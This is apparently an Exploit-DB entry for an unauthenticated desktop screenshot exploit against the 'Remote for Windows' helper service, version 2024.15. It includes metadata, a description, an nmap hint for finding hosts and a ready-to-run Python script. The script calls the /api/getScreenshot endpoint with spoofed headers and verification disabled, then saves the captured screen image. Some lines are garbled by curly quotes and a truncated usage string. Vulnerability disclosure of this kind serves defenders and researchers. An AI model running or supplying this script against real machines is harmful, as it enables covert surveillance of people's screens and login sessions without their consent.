Exploit Details
Basic Information
| Exploit Title | Windows 2024.15 – Unauthenticated Desktop Screenshot Capture |
|---|---|
| Exploit ID | EDB-ID:52300 |
| Type | exploitdb |
| Published | 2025-05-25T00:00:00 |
| Modified | 2025-05-25T00:00:00 |
CVSS Information
| CVSS Score | 0.0 |
|---|---|
| Severity | NONE |
| Vector | NONE |
CVE Information
Exploit Description
Exploit Code
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)
”’
Description:
– Exploits the getScreenshot API endpoint in Remote for Windows helper
service
– Works when “Allow unknown devices” setting is enabled (default: disabled)
– Captures current desktop including login screens (SYSTEM-level access)
Vulnerable Component:
– /api/getScreenshot endpoint with missing authentication checks
# Identification:
nmap -p- -T4
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
”’
#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def capture_screenshot(ip, port, output_file):
try:
response = requests.get(
f”https://{ip}:{port}/api/getScreenshot”,
headers={
“X-ClientToken”: “exploit”,
“X-HostName”: “attacker-pc”,
“X-HostFullModel”: “exploit-device”
},
verify=False,
timeout=15
)
if response.status_code == 200 and
response.content.startswith(b’\xff\xd8′):
with open(output_file, ‘wb’) as f:
f.write(response.content)
print(f”[+] Saved: {output_file}”)
return True
print(f”[-] Failed: HTTP {response.status_code}”)
return False
except Exception as e:
print(f”[-] Error: {str(e)}”)
return False
if __name__ == “__main__”:
if len(sys.argv) < 4:
print(f”Usage: {sys.argv[0]}
sys.exit(1)
sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
else 1)